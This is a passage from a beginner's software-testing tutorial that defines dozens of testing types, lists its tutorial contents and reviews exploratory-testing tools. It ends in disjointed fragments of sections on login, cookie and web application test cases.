validate the documented artifacts such as requirements, test plan,
traceability matrix, test cases.
34. Statement coverage testing: Statement coverage testing is a
white box testing technique which is to validate whether each and
every statement in the code is executed at least once.
35. Decision coverage testing/branch coverage testing: Decision
coverage or branch coverage testing is a white box testing technique
which is to validate every possible branch is executed at least once.
121
36. Path testing: Path coverage testing is a white box testing

technique which is to validate that all the paths of the program are
executed at least once.
37. Mutation testing: Mutation testing is a type of white box testing
which is to change (mutate) certain statements in the source code and
verify if the tests are able to find the errors.
38. Loop testing: Loop testing is a white box testing technique which
is to validate the different kind of loops such as simple loops, nested
loops, concatenated loops and unstructured loops.
39. Performance testing: This type of testing determines or validates
the speed, scalability, and/or stability characteristics of the system or
application under test. Performance is concerned with achieving
response times, throughput, and resource-utilization levels that meet
the performance objectives for the project or product.
40. Load testing: It is to verify that the system/application can handle
the expected number of transactions and to verify the
system/application behavior under both normal and peak load
conditions.
41. Stress testing: It is to verify the behavior of the system once the
load increases more than its design expectations.
42. Soak testing: Running a system at high load for a prolonged
period of time to identify the performance problems is called Soak
Testing.
43. Endurance testing: Refer Soak testing
44. Stability testing: Refer Soak testing
45. Scalability Testing: Scalability testing is a type of non-functional
testing. It is to determine how the application under test scales with
increasing workload.
46. Volume testing: It is to verify that the system/application can
handle a large amount of data
47. Robustness testing: Robustness testing is a type of testing that
is performed to validate the robustness of the application.
48. Vulnerability testing: Vulnerability testing is the process of
identifying the vulnerabilities or weakness in the application.
49. Adhoc testing: Ad-hoc testing is quite opposite to the formal
testing. It is an informal testing type. In Adhoc testing, testers
randomly test the application without following any documents and test
design techniques. This testing is primarily performed if the knowledge
of testers in the application under test is very high. Testers randomly
test the application without any test cases or any business
requirement document.
50. Exploratory testing: Usually, this process will be carried out by
domain experts. They perform testing just by exploring the
functionalities of the application without having the knowledge of the
requirements.
122
51. Retesting: To ensure that the defects which were found and
posted in the earlier build were fixed or not in the current build. Say,
Build 1.0 was released. Test team found some defects (Defect Id
1.0.1, 1.0.2) and posted. Build 1.1 was released, now testing the
defects 1.0.1 and 1.0.2 in this build is retesting.
52. Regression testing: Repeated testing of an already tested
program, after modification, to discover any defects introduced or
uncovered as a result of the changes in the software being tested or in
another related or unrelated software components.
53. Smoke testing: Smoke Testing is done to make sure if the build
we received from the development team is testable or not. It is also
called as “Day 0” check. It is done at the “build level”. It helps not to
waste the testing time to simply testing the whole application when the
key features don’t work or the key bugs have not been fixed yet.
54. Sanity testing: Sanity Testing is done during the release phase to
check for the main functionalities of the application without going
deeper. It is also called as a subset of Regression testing. It is done at
the “release level”. At times due to release time constraints rigorous
regression testing can’t be done to the build, sanity testing does that
part by checking main functionalities.
55. Dynamic testing: Dynamic testing involves in the execution of
code. It validates the output with the expected outcome
56. Static testing: Static Testing involves in reviewing the documents
to identify the defects in the early stages of SDLC.
57. Monkey testing: Perform abnormal action on the application
deliberately in order to verify the stability of the application.
58. Gorilla testing: Gorilla testing is done by testers, sometimes
developers also join hands with testers. It involves testing a system
repeatedly to test the robustness of the system.
59. Usability testing: To verify whether the application is user-friendly
or not and was comfortably used by an end user or not. The main
focus in this testing is to check whether the end user can understand
and operate the application easily or not. An application should be
self-exploratory and must not require training to operate it.
60. Accessibility testing: Accessibility testing is a subset of usability
testing. It aims to discover how easily people with disabilities (such as
visual Impairments, Physical Impairment, Hearing Impairment,
Cognitive Impairment, Learning Impairment) can use a system.
61. Compatibility testing: It is to deploy and check whether the
application is working as expected in a different combination of
environmental components.
62. Configuration testing: Configuration testing is the process of
testing an application with each one of the supported hardware and
software configurations to find out whether the application can work
without any issues.
123
63. Localization testing: Localization is a process of adapting

globalization software for a specific region or language by adding local
specific components.
64. Globalization testing: Globalization is a process of designing a
software application so that it can be adapted to various languages
and regions without any changes.
65. Internationalization testing– Refer Globalization testing
66. Positive Testing: It is to determine what system supposed to do.
It helps to check whether the application is justifying the requirements
or not.
67. Negative testing: It is to determine what system not supposed to
do. It helps to find the defects from the software.
68. Security testing: Security testing is a process to determine
whether the system protects data and maintains functionality as
intended.
Security Testing Complete Guide
69. Penetration testing: Penetration testing is also known as pen
testing. It is a type of security testing. It is performed to evaluate the
security of the system.
Penetration Testing Complete Guide
70. Database testing: Database testing is done to validate the data in
the UI is matched with the data stored in the database. It involves in
checking the schema, tables, triggers etc., of the database.
71. Bucket Testing: Bucket testing is a method to compare two
versions of an application against each other to determine which one
performs better.
72. A/B testing: Refer Bucket Testing…
73. Split testing– Refer bucket testing…
74. Reliability Testing: Perform testing on the application
continuously for a long period of time in order to verify the stability of
the application
75. Interface Testing: Interface testing is performed to evaluate
whether two intended modules pass data and communicate correctly
to one another.
76. Concurrency testing: Concurrency testing means accessing the
application at the same time by multiple users to ensure the stability of
the system. This is mainly used to identify deadlock issues.
77. Fuzz testing: Fuzz testing is used to identify coding errors and
security loopholes in an application. By inputting a massive amount of
random data to the system in an attempt to make it crash to identify if
anything breaks in the application.
78. GUI Testing: Graphical User Interface Testing is to test the
interface between the application and the end user. Mainly testers
concern about the appearance of the elements such as fonts and
colors conforms to design specifications.
124
79. API testing: API stands for Application Programming Interface.

API testing is a type of software testing that involves testing APIs
using some tools like SOAPUI, PostMan.
80. Agile testing: Agile testing is a type of testing that involves
following principles of agile software development methodology. In this
agile testing, testing is conducted throughout the lifecycle of the
continuously evolving project instead of being confined to a particular
phase.
81. End to end testing– Refer system testing…
82. Recovery testing: Recovery testing is performed in order to
determine how quickly the system can recover after the system crash
or hardware failure. It comes under the type of non-functional testing.
83. Risk-based testing: Identify the modules or functionalities which
are most likely cause failures and then testing those functionalities.
84. Installation testing: It is to check whether the application is
successfully installed and it is working as expected after installation.
85. Formal Testing: It is a process where the testers test the
application by having pre-planned procedures and proper
documentation.
86. Pilot testing: Pilot testing is testing carried out under a real-time
operating condition by the company in order to gain the confidence of
the client
87. Backend testing: Refer Database testing…
88. Cross-browser testing: Cross Browser Testing is a type of non-
functional test which helps us to ensure that our website or web
application works as expected in various web browsers.
Read more on Cross Browser Testing…
89. Browser compatibility testing: Refer browser compatibility
testing…
90. Forward compatibility testing: Forward compatibility testing is to
validate the application under test is working as intended in the later
versions of software’s current version.
91. Backward compatibility testing: Backward compatibility testing
is to validate the application under test is working as intended in the
earlier versions of software’s current version.
92. Downward compatibility testing: Refer Backward compatibility
testing…
93. Compliance testing: Compliance testing is non-functional testing
which is done to validate whether the software meets a defined set of
standards.
94. Conformance testing: Refer compliance testing…
95. UI testing: In UI testing, testers aim to test both GUI and
Command Line Interfaces (CLIs)
Also, refer GUI Testing…
125
96. Destructive testing: Destructive testing is a testing technique

which aims to validate the robustness of the application by testing
continues until the application breaks.
97. Dependency testing: Dependency testing is a testing technique
which examines the requirements of an application for pre-conditions,
initial states, and configuration for the proper functioning of the
application.
98. Crowdsourced testing: Crowdsourced testing is carried out by a
community of expert quality assurance testers through an online
platform.
99. ETL testing: ETL (Extract, Transform and Load) testing involves
in validating the data movement from source to destination and
verifying the data count in both source and destination and verifying
data extraction, transformation and also verifying the table relations.
100. Data warehouse testing: Refer ETL testing…
101. Fault injection testing: Fault injection testing is a testing
technique in which fault is intentionally introduced in the code in order
to improve the test coverage.
102. Failover testing: Failover testing is a testing technique that
validates a system’s ability to be able to allocate extra resource during
the server failure and transferring of the processing part to back-up
systems
103. All pair testing: All pair testing approach is to test the application
with all possible combination of the values of input parameters.
104. Pairwise Testing: Refer All pair testing
Here I am going to conclude different types of software testing types. If
you like this post, please share it with your friends.
Here I have hand-picked a few posts which will help you to learn more
interview related stuff:
• Manual Testing Tutorial

• Agile Tutorial
• Manual Testing Interview Questions
• Agile Interview Questions
• General Interview Questions
If you have any more question, feel free to ask via comments. If you
find this post useful, do share it with your friends on Social
Networking.
126
Manual Testing Tutorial –

Complete Guide | Software
Testing Tutorial
In this free online Software Testing Tutorial / Manual Testing Tutorial, we
cover all manual testing concepts in detail with easy to understand
examples. This tutorial is helpful for beginners to advanced level users to
learn software testing concepts with practical examples.
Why This Manual Testing Tutorial?

This Software Testing Tutorial covers right from basics to advanced
test concepts.
What are the prerequisites to learn Manual Testing Tutorials for
beginners & advanced level?
• Basic computer knowledge
• Interest to learn Software Testing
Who is the targeted audience of this Software Testing Tutorial?
Anyone who has the interest to learn Software Testing.
Check the below playlist to watch the complete Testing Tutorial.
Manual Testing Tutorial – Table of
Content
Click on the links below to see the detailed content of each concept in
this Manual Testing Tutorial.
• Software Testing
• Principles of Software Testing
• Software Development Life Cycle
• Waterfall Model in SDLC
• Spiral Model in SDLC
• V Model in SDLC
• Agile Scrum Methodology
• Software Testing Life Cycle
• Bug Life Cycle
• Types of Software Testing
• Levels of Testing
• Performance Testing Types
• Functional Testing
• Unit Testing
• Integration Testing
• End-To-End Testing
• What is Regression Testing & When Do We Do?
• What is Retesting & When Do We Do?
127
• Manual Testing Methods

• Test Deliverables
• Test Strategy
• Test Plan
• Test Case Template With Explanation
• Test Scenarios of Login Page
• Test Scenarios of Registration Page
• How To Write Test Cases for ATM
• Do We Really Write Test Cases For All Testing Types
• Bug Report Template
• Test Metrics
• Requirement Traceability Matrix – RTM
• Write Good Bug Report
• Software Architecture
• Black Box Test Design Techniques
• Equivalence Partitioning Testing Technique
• Boundary Value Analysis Testing Technique
• Decision Table Test Design Technique
• State Transition Test Design Technique
• Bug Severity And Priority – Info-graphic
• Defect Triage Process in Software Testing
• Performance Testing – Complete Guide
• Penetration Testing – Complete Guide
• Security Testing – Complete Guide
• Cross Browser Testing
• Cross Browser Testing Checklist
• ERP Application Testing
• Web Application Testing Tutorial
• Mobile App Testing Guide
• API Testing – Complete Guide
• Website Cookie Testing Guide
• Shift-Left Testing
• Documentation Testing
• Independent Testing
• PDCA Cycle
• Choose Software Testing As A Career
• 7 Steps To Become A Pro At QA Testing
• Software Testing Interview Questions Free eBook
• Principles of Agile Software Development
Difference Between Software Testing Types:
• SDLC Vs STLC
• Manual vs Automation Testing
• Black Box And White Box Testing
• Smoke Testing Vs Sanity Testing
• Test Strategy Vs Test Plan
• Test Case Vs Test Scenario
128
• Regression Vs Retesting
• Severity Vs Priority
• Functional Vs Non-Functional Testing
• Unit Testing Vs Integration Testing
• Integration Vs System Testing
• Verification And Validation
• Entry And Exit Criteria
• Performance Engineering Vs Performance Testing
• Performance Vs Load Testing
• Load Testing Vs Stress Testing
• Difference between Desktop, Client-Server And Web
Application Testing
• Difference Between Defect Bug Error And Failure
Interview Preparation Topics:
• Manual Testing Interview Questions
• Real-Time Software QA Interview Questions And Answers
• Agile Testing Interview Questions
• JIRA Interview Questions
ISTQB Certification:
ISTQB stands for International Software Testing Qualification Board. I
don’t say you will get a salary hike if you finish this certification but its
always good to have certification in career development.
• How To Prepare for ISTQB Exam
• ISTQB Quiz
Software Testing Tools:
Manual testing does not mean that the software testers won’t use any
tool in the process of testing. There are several tools available in the
market which helps Software QA’s to test an application in an efficient
manner.
• Best Test Management Tools
• Best Defect Tracking Tools
• Best Automation Testing Tools
• Best Regression Testing Tools
• Best Cross Browser Testing Tools
• Best Unit Testing Tools
• Best Functional Testing Tools
• Best Web Application Testing Tools
• Best API Testing Tools
• Best Performance Testing Tools
• Best Penetration Testing Tools
• Best Open Source Security Testing Tools
• Best Service Virtualization Tools
Before concluding, download a sample resume and modify as per your
needs
129
Resume:
• Sample Resume for Software Testers
If you want us to cover any other topic, please comment below.
Finally, Happy Testing!
Check the below links to learn more
• Automation Testing – Selenium WebDriver.

• TestNG Tutorial
• VBScript Tutorial
• SQL Tutorial
• Java Tutorial
Best Exploratory Testing Tools in

2020
In exploratory testing, we don’t create test cases in advance and we
do test design and execution at the same time with no or less
planning.
Check this Exploratory Testing guide for detailed understanding.

Let’s see the exploratory testing tools that facilitate organizing,
recording, and documenting during the hunt. Let’s do that now. Here
we are going to list both open source exploratory testing tools and
commercial ones.
Page Contents
Let’s get started,
Popular Exploratory Testing Tools:

#1 Exploratory Testing Chrome Extension
It is a chrome extension that is designed for making web exploratory
testing. It allows you to report bugs, queries, take screenshots during
the session, save sessions results in a report, import, and export
session.
Features:
• Report bugs, ideas, notes, and questions easily
• Capture screenshots during the session
• Automatic URL tracking
• Monitor session results in a report
• Save and import session
130
• Export session to different file formats such as JSON, CSV or

HTML
Link: Exploratory Testing Chrome Extension
#2 Bug Magnet
Bug magnet is an Exploratory testing assistant for Chrome. It allows

you to add common problematic values and edge cases to the context
menu (right-click menu) for editable elements, so you can keep them
handy and access them easily during exploratory testing sessions.
Features:
• Convenient access to common boundaries and edge cases for
exploratory testing
• Possible to extend it with our customized config files easily
• Works on input fields, text areas, and editable DIVs
Link: Bug Magnet
#3 Session Tester
Session Tester is an exploratory testing tool for managing and

recording Session-Based Testing. It has a feature called timer. It
allows you to limit the length of a test session, and it provides an easy
way to record session notes. It stores the notes in an XML format and
it is convertible to HTML.
Link: Session Tester

#4 PractiTest
PractiTest Test Management Tool includes a new type of test that

supports Exploratory and Session-Based Testing practices. This
feature helps you to improve QA coverage and traceability.
Exploratory tests in PractiTest allow you to define charters & guide

points for your exploratory sessions and save those guidelines as test
cases for future reusability. Additionally, it allows you to document the
points that arise in the annotation section as you are running your
131
tests, report, and link existing issues when running the exploratory
testing test cases. Finally, you can create reports based on your
sessions and later review them with your colleagues and your team
lead in order to gather feedback.
To get a better idea about how this works, check out PractiTest’s full
exploratory testing documentation
#5 TestPad
Testpad test management tool’s checklists make great guides for

exploratory testing. Steer testing with a high-level list of features or go
as detailed as you need. It allows you to add new tests, during a
session, as you think of them.
Link: TestPad Exploratory Testing Tool
#6 QTest Explorer
QTest is a smarter exploratory testing tool. It is one of the automated

exploratory testing tools for exploratory testing. It frees you up from
manual screen grabs and tedious documentation.
• It allows you to test faster, capture test sessions, and report

bugs.
• It allows you to capture exploratory testing sessions and
automatically record user interactions.
• It integrates with Jira, Rally, and CA Agile Central for automatic
updates.
• qTest Explorer’s intelligent capturing engine instantly turn your
test sessions into automated Selenium or Protractor test scripts
Link: Tricentis QTest
#7 TestRail
TestRail is a comprehensive test case management and exploratory

testing tool for your team. It allows you to store your test sessions and
allows you to add custom fields when working with test sessions.
Link: TestRail
#8 Rapid Reporter
132
Rapid Reporter is an SBTM – Session-Based Test Management Tool.

It manages exploratory tests by taking notes during an uninterrupted
testing session and use the notes to review afterward. There is no
installation required since it is a standalone tool. It allows you to save
notes in CSV text files, which allows you to combine plain text
flexibility with spreadsheets.
It is one of the free exploratory testing tools in the market.

Link: Rapid Reporter
#9 Azure Test Plans
Azure Test Plans is an exploratory testing toolkit. It helps you to

improve your code quality using planned and exploratory testing
services for your apps.
• It allows you to design and execute tests simultaneously to

maximize quality in modern software development processes
using exploratory test sessions.
• It captures rich scenario data as you execute exploratory tests.
• You can test your application by executing tests across desktop
or web apps.
Link: Azure Test Plans
#10 Testuff
Testuff test management software helps in your exploratory testing. It

includes Screen capture functionality, video recording capabilities,
ability to add additional files and notes, and allows you to send
information directly to your favorite issue tracker.
Link: Testuff

Software Testing Tutorial

Uploaded by

Software Testing Tutorial

Uploaded by

1

Test Scenarios of a Registration Form:

1. Verify that the Registration form contains Username, First

20. Verify that the “terms and conditions” checkbox is

Test Cases – Login Page

4 Verify the ‘Forgot Password’ functionality. Positive

5 Verify the messages for invalid login. Positive

6 Verify the ‘Remember Me’ functionality. Positive

Sr. Type- Negative/ Posit

Other Test Cases

Non-functional Security Test Cases:

4 Verify the timeout functionality of the login session. Positive

7 Verify the Login page against SQL injection attack. Nega

8 Verify the implementation of SSL certificate. Posit

Test Cases for Gmail Login page

9 Verify the ‘Forgot email’ functionality.

10 Verify the ‘Forgot password’ functionality.

Test Scenarios for the Sign-up page

Also many a time it is the first impression of an application, so it should be

Test Scenarios Login Page [How

Must Read: Test Case Template With Detailed Explanation

1. ‘Email/Phone Number/Username’ Textbox

6. ‘Forgot Password’ Link

Must Read: Test Plan Template With Detailed Explanation

40. Verify whether the CAPTCHA has audio support to listen

Learn Website Cookie Testing –

A Cookie is a small piece of information sent from a website and stored on

How do Cookies work?

Remember there will be an expiration time for cookies. Expiration time

It is also called as an in-memory cookie or transient cookie. Session cookies

In simple words, it stores in a temporary memory which expires once you

Where Are Cookies Stored In Different Browsers?

Chrome: Settings – Advanced – Privacy and security – Content Settings –

How to test Cookies – Sample Test Cases for Web

Plugins To Test Cookies:

For Mozilla Firefox Users:

Some other tools to test the cookies

• Set the Cookie name and Value

Cookie Checker – Here is the link to the site

• CrossBrowserTesting Tool – Review

20 Scenarios for Testing login

I explained to him that, few major reasons why UX testing is so important is

6. Login credentials, especially password, should be stored in database in encrypted

Predict the quality of your project with Agile

8. All search keyword/filters should get cleared on clicking Reset button

How to test Web Application:

Some commonly used artifacts are as follows

Typically, functional testing includes the following tasks:

A tester needs to test end to end workflow or business scenarios.

Testing HyperLinks (Link Testing):

Forms testing includes:

• Verify whether the default values are being populated

Cookie Testing is the process of verifying whether the cookies are

Read more on Cookie Testing here

• Verify HTML syntax errors

Usability testing is performed by testers internally or by getting

• All pages of your site are understandable and easy to use

Database testing includes the following:

• Data validity testing

Browser Compatibility Testing:

While testing a website, we need to ensure that our website is

We need to provide the same experience for users no matter what

Web application performance testing is conducted to mitigate the risk

Performance testing encompasses a number of different types of

Read more on Performance Testing here

Security tests include testing for vulnerabilities such as

Crowd Testing or Crowdsourced testing:

Learn Website Cookie Testing –

A Cookie is a small piece of information sent from a website and

How do Cookies work?

Remember there will be an expiration time for cookies. Expiration time

It is also called as an in-memory cookie or transient cookie. Session

In simple words, it stores in a temporary memory which expires once

Where Are Cookies Stored In Different Browsers?

Chrome: Settings – Advanced – Privacy and security – Content

How to test Cookies – Sample Test Cases for Web